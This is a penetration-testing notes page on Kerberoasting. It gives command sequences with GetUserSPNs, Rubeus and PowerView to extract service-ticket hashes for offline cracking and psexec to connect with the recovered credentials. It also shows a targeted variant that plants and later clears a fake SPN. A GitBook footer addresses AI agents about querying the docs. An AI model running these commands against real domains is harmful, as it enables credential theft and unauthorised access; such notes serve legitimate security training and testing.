> For the complete documentation index, see [llms.txt](https://ivalexev.gitbook.io/rednote/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ivalexev.gitbook.io/rednote/pentesting-process/active-directory/kerberoasting.md).

# Kerberoasting

In the second phase of Kerberos, the client requests the TGS from the KDC to access a resource of a Service Principal Name (SPN). No authorization checks, permissions, etc. are applied, as this is done by the SPN when it receives the TGS. This means that the attacker can request the TGS for a given SPN and then crack it offline to obtain the SPN password.

***NOTE**: If the SPN is running in the context of a computer account, a managed service account, or a group-managed service account, the password will be randomly generated, complex, and 120 characters long, making it impossible to crack. For this reason, **you should focus on SPNs running in the context of user accounts**.*

## Attack

{% tabs %}
{% tab title="Remotely" %}
**Linux**

[impacket-GetUserSPNs](https://github.com/fortra/impacket/blob/master/examples/GetUserSPNs.py) will attempt to list and get the TGS for the logged in account's SPNs.\
You must have the credentials of a domain user to perform the extraction.

Synchronize time with domain controller with `ntpdate` or `rdate`.

<pre class="language-bash" data-overflow="wrap"><code class="lang-bash"><strong>sudo ntpdate &#x3C;IP_DC>
</strong></code></pre>

Listing SPN Accounts

{% code overflow="wrap" %}

```bash
GetUserSPNs.py -dc-ip <IP_DC> <DOMAIN>/<USER[:PASSWORD]>
```

{% endcode %}

Pull all TGS tickets

{% code overflow="wrap" %}

```bash
GetUserSPNs.py -request -dc-ip <IP_DC> <DOMAIN>/<USER[:PASSWORD]> [-outputfile <OUT_NAME>]
```

{% endcode %}

Get TGS ticket for a specific account

{% code overflow="wrap" %}

```bash
GetUserSPNs.py -request-user <NAME> -dc-ip <IP_DC> <DOMAIN>/<USER[:PASSWORD]> [-outputfile <OUT_NAME>]
```

{% endcode %}

Offline cracking of output with hashcat (`-m 13100`)
{% endtab %}

{% tab title="Locally" %}
**Windows**

Since we are already in a windows system belonging to the domain, we do not need to specify username and password.

We can use [Rebus](https://github.com/GhostPack/Rubeus) to get the TGS for the logged in account's SPNs.

```powershell-session
.\Rubeus.exe kerberoast /stats
```

{% code overflow="wrap" %}

```powershell
.\Rubeus.exe kerberoast /outfile:<OutputFile> [/user:<NAME_TARGET>] [/tgtdeleg]
```

{% endcode %}

*`tgtdeleg` up to Windows server 2016 allows you to request ticket in RC4, much easier to crack.*

Or with PowerView ([old](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) and [new](https://github.com/BC-SECURITY/Empire/blob/main/empire/server/data/module_source/situational_awareness/network/powerview.ps1))

{% code overflow="wrap" %}

```powershell
Import-Module .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat
Get-DomainUser -Identity <NAME_TARGET> | Get-DomainSPNTicket -Format Hashcat
```

{% endcode %}

Offline cracking of file `<OutputFile>` with hashcat (ex. `-m 13100`)
{% endtab %}
{% endtabs %}

Connect&#x20;

{% code overflow="wrap" %}

```bash
psexec.py <DOMAIN>/<USER>@<IP>
psexec.py <DOMAIN>/<USER>@<MACHINE_NAME>.<DOMAIN> -target-ip <MACHINE_IP>
```

{% endcode %}

## Targeted Kerberoasting <a href="#targeted-kerberoasting" id="targeted-kerberoasting"></a>

This abuse can be carried out when controlling an object that has a `GenericAll`, `GenericWrite`, `WriteProperty` or `Validated-SPN` over the target.\
The attacker can add an SPN (`ServicePrincipalName`) to that account. Once the account has an SPN, it becomes vulnerable to Kerberoasting. This technique is called **Targeted Kerberoasting**.

{% tabs %}
{% tab title="Remotely" %}
With [targetedKerberoast.py](https://github.com/ShutdownRepo/targetedKerberoast)

{% code overflow="wrap" %}

```bash
targetedKerberoast.py -u <USER> -p <PASS> -d <DOMAIN> --dc-ip <IP>
```

{% endcode %}

With kerberos authentication (`-k`), we have to use the TGT, otherwise we get the error “ *'NoneType' object has no attribute 'getCredential'* ”.

{% code overflow="wrap" %}

```bash
impacket-getTGT <DOMAIN>/<USER>:<PASS> -dc-ip <IP>
export KRB5CCNAME=./<USER>.ccache
targetedKerberoast.py -u <USER> -p <PASS> -d <DOMAIN> --dc-host <HOSTNAME> -v -k
```

{% endcode %}

For some tools (ex. evil-winrm), it may be necessary to set the `/etc/krb5.conf` file.\
The minimum structure is as follows:

{% code overflow="wrap" %}

```
[libdefaults]
  default_realm = <DOMAIN.COM>

[realms]
  <DOMAIN.COM> = {
    kdc = <DC.DOMAIN.COM>
  }
```

{% endcode %}
{% endtab %}

{% tab title="Locally" %}
{% code overflow="wrap" %}

```powershell
$SecPassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>', $SecPassword)
```

{% endcode %}

**Creating a Fake SPN** with PowerView ([old](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) and [new](https://github.com/BC-SECURITY/Empire/blob/main/empire/server/data/module_source/situational_awareness/network/powerview.ps1))

{% code overflow="wrap" %}

```powershell
Import-Module .\PowerView.ps1
Set-DomainObject -Credential $Cred -Identity <TARGET> -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose
```

{% endcode %}

**Kerberoasting** with [Rubeus](https://github.com/GhostPack/Rubeus)

{% code overflow="wrap" %}

```powershell
.\Rubeus.exe kerberoast /user:<USER> /nowrap
```

{% endcode %}

**Cleanup fake SPN**

{% code overflow="wrap" %}

```powershell
Set-DomainObject -Credential $Cred -Identity <TARGET> -Clear serviceprincipalname -Verbose
```

{% endcode %}
{% endtab %}
{% endtabs %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ivalexev.gitbook.io/rednote/pentesting-process/active-directory/kerberoasting.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.